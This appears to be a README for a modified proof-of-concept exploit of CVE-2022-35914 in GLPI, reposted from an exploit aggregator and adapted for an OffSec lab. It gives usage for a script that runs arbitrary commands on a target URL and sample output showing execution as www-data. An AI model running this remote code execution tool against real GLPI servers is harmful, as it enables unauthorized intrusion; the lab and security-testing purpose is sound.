Share
## https://sploitus.com/exploit?id=9ED23B71-9DE8-58A1-98D0-B779DBA8668D
# CVE-2022-35914_poc
Modified for GLPI Offsec Lab: call_user_func, array_map, passthru

## References
Modified to work for Proving Grounds Practice Lab: GLPI

- https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
- https://github.com/cosad3s/CVE-2022-35914-poc/blob/main/CVE-2022-35914.py
- Mayfly Blog Post: https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/

## Usage

```bash
pip3 install -r requirements.txt
```

```bash
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Modified for Offsec Lab: GLPI

options:
  -h, --help              show this help message and exit
  -u URL                  URL to test
  -c CMD                  Command to launch
  --check                 Just check, no command execution.
  --user-agent USER_AGENT Custom User-Agent
```

Example:

```bash
python3 CVE-2022-35914.py -u http://127.0.0.1
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```